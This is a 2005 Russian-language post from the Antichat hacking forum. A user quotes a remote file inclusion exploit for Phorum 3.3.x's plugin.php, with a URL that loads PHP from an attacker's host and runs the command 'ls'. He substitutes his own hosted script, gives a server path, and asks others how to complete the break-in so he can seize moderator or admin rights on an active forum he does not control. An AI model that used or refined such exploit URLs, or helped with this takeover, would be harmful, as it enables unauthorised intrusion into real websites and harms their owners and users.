ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Старенький Phorum 3.3.1а
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Старенький Phorum 3.3.1а
  #1  
Старый 30.12.2005, 15:55
Аватар для SarDoX
SarDoX
Новичок
Регистрация: 30.12.2005
Сообщений: 1
Провел на форуме:
2089

Репутация: 0
По умолчанию Старенький Phorum 3.3.1а
фоумок нашел.на секлабе к нему есть пара сплоитов

один из них(по идее должен работать и на 3,3,1)
Phorum 3.3.2a (http://www.phorum.org)
(http://www.pomorsu.ru/doc/opennet/op...3_222.txt.html)
внедрение произвольного PHP кода в plugin.php. Пример:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= http://[evilhost]&cmd=ls

создал: http://ftpserver1.narod.ru/replace.php
вопрос: как будет выглядеть полностью строчка

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://ftpserver1.narod.ru/replace.php&cmd=ls
гм.. что писать в setting dir?.

случняком напоролся при узучении, возможно мне поможет(где лежит форум...)
/home/forumgames/
--------------
если через эту уязвимость не проникну, тогда что посоветуете?
п..с все, что надо - получить права модера, т..к на одном нашем форуме модера и админа просто нет(трудно в это поверить..). форум активный очень, но засранный.но что б получить права модера, нужны скорее всего будут права админа.
Последний раз редактировалось SarDoX; 30.12.2005 в 15:59..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ